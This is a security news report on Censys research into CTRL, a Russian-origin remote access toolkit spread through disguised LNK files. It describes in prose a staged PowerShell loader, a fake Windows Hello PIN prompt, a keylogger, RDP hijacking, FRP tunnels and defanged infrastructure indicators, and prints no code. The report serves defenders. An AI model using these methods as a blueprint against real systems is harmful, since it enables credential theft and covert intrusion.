Russian CTRL Toolkit Delivered via Malicious LNK Files Hijacks RDP via FRP Tunnels

Cybersecurity researchers have uncovered a sophisticated Russian-origin remote access toolkit called CTRL that's being distributed through malicious Windows shortcut (LNK) files disguised as private key folders. The toolkit, custom-built using .NET, enables credential phishing, keylogging, Remote Desktop Protocol (RDP) hijacking, and reverse tunneling via Fast Reverse Proxy (FRP).

According to Censys security researcher Andrew Northern, the CTRL toolkit includes various executables designed to facilitate encrypted payload loading, credential harvesting through a polished Windows Hello phishing UI, keylogging, RDP session hijacking, and reverse proxy tunneling through FRP.

Attack Chain and Delivery Mechanism

The attack begins with a weaponized LNK file named "Private Key #kfxm7p9q_yek.lnk" featuring a folder icon to trick users into double-clicking. This triggers a multi-stage decryption process:

1. The LNK file launches a hidden PowerShell command that wipes existing persistence mechanisms from the victim's Windows Startup folder
2. It decodes a Base64-encoded blob and runs it in memory
3. A stager tests TCP connectivity to hui228[.]ru:7000 and downloads next-stage payloads
4. The stager modifies firewall rules, sets up persistence using scheduled tasks, creates backdoor local users, and spawns a cmd.exe shell server on port 5267 accessible through the FRP tunnel

The discovery came after Censys recovered CTRL from an open directory at 146.19.213[.]155 in February 2026.

CTRL Management Platform Architecture

One of the downloaded payloads, "ctrl.exe," functions as a .NET loader for launching an embedded payload called the CTRL Management Platform. This platform can serve as either a server or client depending on command-line arguments, with communication occurring over a Windows named pipe.

"The dual-mode design means the operator deploys ctrl.exe once on the victim (via the stager), then interacts with it by running ctrl.exe client through the FRP-tunneled RDP session," Northern explained. "The named pipe architecture keeps all C2 command traffic local to the victim machine — nothing traverses the network except the RDP session itself."

Credential Harvesting and Keylogging Capabilities

The toolkit's credential harvesting component launches as a Windows Presentation Foundation (WPF) application that mimics a real Windows PIN verification prompt. The module blocks attempts to escape the phishing window via keyboard shortcuts like Alt+Tab, Alt+F4, or F4, and validates entered PINs against the real Windows credential prompt using UI automation with the SendKeys() method.

"If the PIN is rejected, the victim is looped back with an error message," Northern said. "The window remains open even if the PIN successfully validates against the actual Windows authentication system. The captured PIN is logged with the prefix [STEALUSER PIN CAPTURED] to the same keylog file used by the background keylogger."

The keylogger runs as a background service (when configured as a server) to capture all keystrokes to a file named "C:\Temp\keylog.txt" by installing a keyboard hook.

Additional Attack Vectors

The toolkit includes commands to send toast notifications impersonating popular web browsers including Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Iron for additional credential theft or payload delivery.

Reverse Tunneling Infrastructure

Two additional payloads support the attack:

• FRPWrapper.exe: A Go DLL loaded in memory to establish reverse tunnels for RDP and raw TCP shell through the operator's FRP server
• RDPWrapper.exe: Enables unlimited concurrent RDP sessions

Operational Security Features

"The toolkit demonstrates deliberate operational security. None of the three hosted binaries contain hard-coded C2 addresses," Censys noted. "All data exfiltration occurs through the FRP tunnel via RDP — the operator connects to the victim's desktop and reads keylog data through the ctrl named pipe."

This architecture leaves minimal network forensic artifacts compared to traditional C2 beacon patterns. By routing all interaction through FRP reverse tunnels to RDP sessions, the operator avoids the network-detectable beacon patterns that characterize commodity RATs.

Trend Toward Purpose-Built Toolkits

The CTRL toolkit represents a trend toward purpose-built, single-operator toolkits that prioritize operational security over feature breadth. This approach demonstrates how attackers are evolving to use more sophisticated, targeted methods that are harder to detect through traditional network monitoring.

The discovery highlights the ongoing evolution of cyber threats and the need for organizations to implement comprehensive security measures that go beyond traditional antivirus solutions, including monitoring for unusual RDP activity and implementing strict controls on LNK file execution.